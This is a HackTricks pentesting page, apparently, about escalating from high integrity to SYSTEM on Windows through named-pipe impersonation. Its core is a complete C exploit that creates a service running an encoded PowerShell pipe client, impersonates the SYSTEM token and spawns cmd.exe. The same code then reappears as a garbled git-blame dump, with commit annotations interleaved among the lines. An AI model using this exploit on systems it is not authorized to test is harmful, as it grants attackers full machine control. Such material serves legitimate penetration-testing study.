hacktricks/windows-hardening/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md



<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!

- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)

- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**

- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.

</details>


**Code flow:**

1. Create a new Pipe
2. Create and start a service that will connect to the created pipe and write something. The service code will execute this encoded PS code: `$pipe = new-object System.IO.Pipes.NamedPipeClientStream("piper"); $pipe.Connect(); $sw = new-object System.IO.StreamWriter($pipe); $sw.WriteLine("Go"); $sw.Dispose();`
3. The service receive the data from the client in the pipe, call ImpersonateNamedPipeClient and waits for the service to finish
4.  Finally, uses the token obtained from the service to spawn a new _cmd.exe_

{% hint style="warning" %}
If you don't have enough privileges the exploit may get stucked and never return.
{% endhint %}

```c
#include <windows.h>
#include <time.h>

#pragma comment (lib, "advapi32")
#pragma comment (lib, "kernel32")

#define PIPESRV "PiperSrv"
#define MESSAGE_SIZE 512

int ServiceGo(void) {

	SC_HANDLE scManager;
	SC_HANDLE scService;

	scManager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);

	if (scManager == NULL) {
		return FALSE;
	}

	// create Piper service
	scService = CreateServiceA(scManager, PIPESRV, PIPESRV, SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,
		SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL,
		"C:\\Windows\\\System32\\cmd.exe /rpowershell.exe -EncodedCommand JABwAGkAcABlACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFAAaQBwAGUAcwAuAE4AYQBtAGUAZABQAGkAcABlAEMAbABpAGUAbgB0AFMAdAByAGUAYQBtACgAIgBwAGkAcABlAHIAIgApADsAIAAkAHAAaQBwAGUALgBDAG8AbgBuAGUAYwB0ACgAKQA7ACAAJABzAHcAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AVwByAGkAdABlAHIAKAAkAHAAaQBwAGUAKQA7ACAAJABzAHcALgBXAHIAaQB0AGUATABpAG4AZQAoACIARwBvACIAKQA7ACAAJABzAHcALgBEAGkAcwBwAG8AcwBlACgAKQA7AA==",
		NULL, NULL, NULL, NULL, NULL);

	if (scService == NULL) {
		//printf("[!] CreateServiceA() failed: [%d]\n", GetLastError());
		return FALSE;
	}

	// launch it
	StartService(scService, 0, NULL);

	// wait a bit and then cleanup
	Sleep(10000);
	DeleteService(scService);

	CloseServiceHandle(scService);
	CloseServiceHandle(scManager);
}

int main() {

	LPCSTR sPipeName = "\\\\.\\pipe\\piper";
	HANDLE hSrvPipe;
	HANDLE th;
	BOOL bPipeConn;
	char pPipeBuf[MESSAGE_SIZE];
	DWORD dBRead = 0;

	HANDLE hImpToken;
	HANDLE hNewToken;
	STARTUPINFOA si;
	PROCESS_INFORMATION pi;

	// open pipe
	hSrvPipe = CreateNamedPipeA(sPipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE | PIPE_WAIT,
		PIPE_UNLIMITED_INSTANCES, 1024, 1024, 0, NULL);

	// create and run service
	th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)ServiceGo, NULL, 0, 0);

	// wait for the connection from the service
	bPipeConn = ConnectNamedPipe(hSrvPipe, NULL);
	if (bPipeConn) {
		ReadFile(hSrvPipe, &pPipeBuf, MESSAGE_SIZE, &dBRead, NULL);

		// impersonate the service (SYSTEM)
		if (ImpersonateNamedPipeClient(hSrvPipe) == 0) {
			return -1;
		}

		// wait for the service to cleanup
		WaitForSingleObject(th, INFINITE);

		// get a handle to impersonated token
		if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &hImpToken)) {
			return -2;
		}

		// create new primary token for new process
		if (!DuplicateTokenEx(hImpToken, TOKEN_ALL_ACCESS, NULL, SecurityDelegation,
			TokenPrimary, &hNewToken)) {
			return -4;
		}

		//Sleep(20000);
		// spawn cmd.exe as full SYSTEM user
		ZeroMemory(&si, sizeof(si));
		si.cb = sizeof(si);
		ZeroMemory(&pi, sizeof(pi));
		if (!CreateProcessWithTokenW(hNewToken, LOGON_NETCREDENTIALS_ONLY, L"cmd.exe", NULL,
			NULL, NULL, NULL, (LPSTARTUPINFOW)&si, &pi)) {
			return -5;
		}

		// revert back to original security context
		RevertToSelf();

	}

	return 0;
}
```


<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!

- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)

- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**

- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.

</details>
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00

			`<details>`

update twitter 2023-04-25 18:35:28 +00:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
change support text 2022-09-09 11:28:04 +00:00			`- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
change support text 2022-09-09 11:28:04 +00:00			`- Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
change support text 2022-09-09 11:28:04 +00:00			`- Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
update twitter 2023-04-25 18:35:28 +00:00			`- Join the [💬](https://emojipedia.org/speech-balloon/) [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow me on Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks_live).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
hacktricks twitch 2022-12-05 22:29:21 +00:00			`- Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`


GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`Code flow:`

			`1. Create a new Pipe`
			2. Create and start a service that will connect to the created pipe and write something. The service code will execute this encoded PS code: `$pipe = new-object System.IO.Pipes.NamedPipeClientStream("piper"); $pipe.Connect(); $sw = new-object System.IO.StreamWriter($pipe); $sw.WriteLine("Go"); $sw.Dispose();`
			`3. The service receive the data from the client in the pipe, call ImpersonateNamedPipeClient and waits for the service to finish`
			`4. Finally, uses the token obtained from the service to spawn a new _cmd.exe_`

GitBook: [master] one page modified 2020-12-28 14:16:10 +00:00			`{% hint style="warning" %}`
			`If you don't have enough privileges the exploit may get stucked and never return.`
			`{% endhint %}`

GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```c
			`#include <windows.h>`
			`#include <time.h>`

			`#pragma comment (lib, "advapi32")`
			`#pragma comment (lib, "kernel32")`

			`#define PIPESRV "PiperSrv"`
			`#define MESSAGE_SIZE 512`

			`int ServiceGo(void) {`

			`SC_HANDLE scManager;`
			`SC_HANDLE scService;`

			`scManager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);`

			`if (scManager == NULL) {`
			`return FALSE;`
			`}`

			`// create Piper service`
GitBook: [master] one page modified 2020-12-28 14:14:40 +00:00			`scService = CreateServiceA(scManager, PIPESRV, PIPESRV, SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,`
			`SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL,`
			"C:\\Windows\\\System32\\cmd.exe /rpowershell.exe -EncodedCommand JABwAGkAcABlACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFAAaQBwAGUAcwAuAE4AYQBtAGUAZABQAGkAcABlAEMAbABpAGUAbgB0AFMAdAByAGUAYQBtACgAIgBwAGkAcABlAHIAIgApADsAIAAkAHAAaQBwAGUALgBDAG8AbgBuAGUAYwB0ACgAKQA7ACAAJABzAHcAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AVwByAGkAdABlAHIAKAAkAHAAaQBwAGUAKQA7ACAAJABzAHcALgBXAHIAaQB0AGUATABpAG4AZQAoACIARwBvACIAKQA7ACAAJABzAHcALgBEAGkAcwBwAG8AcwBlACgAKQA7AA==",
			`NULL, NULL, NULL, NULL, NULL);`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`if (scService == NULL) {`
			`//printf("[!] CreateServiceA() failed: [%d]\n", GetLastError());`
			`return FALSE;`
			`}`
GitBook: [master] one page modified 2020-12-28 14:14:40 +00:00
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`// launch it`
			`StartService(scService, 0, NULL);`

			`// wait a bit and then cleanup`
			`Sleep(10000);`
			`DeleteService(scService);`

			`CloseServiceHandle(scService);`
GitBook: [master] one page modified 2020-12-28 14:14:40 +00:00			`CloseServiceHandle(scManager);`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`}`

			`int main() {`

GitBook: [master] one page modified 2020-12-28 14:14:40 +00:00			`LPCSTR sPipeName = "\\\\.\\pipe\\piper";`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`HANDLE hSrvPipe;`
			`HANDLE th;`
			`BOOL bPipeConn;`
			`char pPipeBuf[MESSAGE_SIZE];`
			`DWORD dBRead = 0;`

			`HANDLE hImpToken;`
			`HANDLE hNewToken;`
			`STARTUPINFOA si;`
			`PROCESS_INFORMATION pi;`

			`// open pipe`
GitBook: [master] one page modified 2020-12-28 14:14:40 +00:00			`hSrvPipe = CreateNamedPipeA(sPipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE \| PIPE_WAIT,`
			`PIPE_UNLIMITED_INSTANCES, 1024, 1024, 0, NULL);`

GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`// create and run service`
GitBook: [master] one page modified 2020-12-28 14:14:40 +00:00			`th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)ServiceGo, NULL, 0, 0);`

GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`// wait for the connection from the service`
			`bPipeConn = ConnectNamedPipe(hSrvPipe, NULL);`
			`if (bPipeConn) {`
			`ReadFile(hSrvPipe, &pPipeBuf, MESSAGE_SIZE, &dBRead, NULL);`
GitBook: [master] one page modified 2020-12-28 14:14:40 +00:00
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`// impersonate the service (SYSTEM)`
			`if (ImpersonateNamedPipeClient(hSrvPipe) == 0) {`
			`return -1;`
			`}`
GitBook: [master] one page modified 2020-12-28 14:14:40 +00:00
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`// wait for the service to cleanup`
			`WaitForSingleObject(th, INFINITE);`
GitBook: [master] one page modified 2020-12-28 14:14:40 +00:00
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`// get a handle to impersonated token`
			`if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &hImpToken)) {`
GitBook: [master] one page modified 2020-12-28 14:14:40 +00:00			`return -2;`
			`}`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`// create new primary token for new process`
			`if (!DuplicateTokenEx(hImpToken, TOKEN_ALL_ACCESS, NULL, SecurityDelegation,`
GitBook: [master] one page modified 2020-12-28 14:14:40 +00:00			`TokenPrimary, &hNewToken)) {`
			`return -4;`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`}`

			`//Sleep(20000);`
			`// spawn cmd.exe as full SYSTEM user`
			`ZeroMemory(&si, sizeof(si));`
			`si.cb = sizeof(si);`
			`ZeroMemory(&pi, sizeof(pi));`
GitBook: [master] one page modified 2020-12-28 14:14:40 +00:00			`if (!CreateProcessWithTokenW(hNewToken, LOGON_NETCREDENTIALS_ONLY, L"cmd.exe", NULL,`
			`NULL, NULL, NULL, (LPSTARTUPINFOW)&si, &pi)) {`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`return -5;`
			`}`
GitBook: [master] one page modified 2020-12-28 14:14:40 +00:00
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`// revert back to original security context`
			`RevertToSelf();`
GitBook: [master] one page modified 2020-12-28 14:14:40 +00:00
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`}`

			`return 0;`
			`}`
			```

Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00

			`<details>`

update twitter 2023-04-25 18:35:28 +00:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
change support text 2022-09-09 11:28:04 +00:00			`- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
change support text 2022-09-09 11:28:04 +00:00			`- Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
change support text 2022-09-09 11:28:04 +00:00			`- Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
update twitter 2023-04-25 18:35:28 +00:00			`- Join the [💬](https://emojipedia.org/speech-balloon/) [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow me on Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks_live).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
hacktricks twitch 2022-12-05 22:29:21 +00:00			`- Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`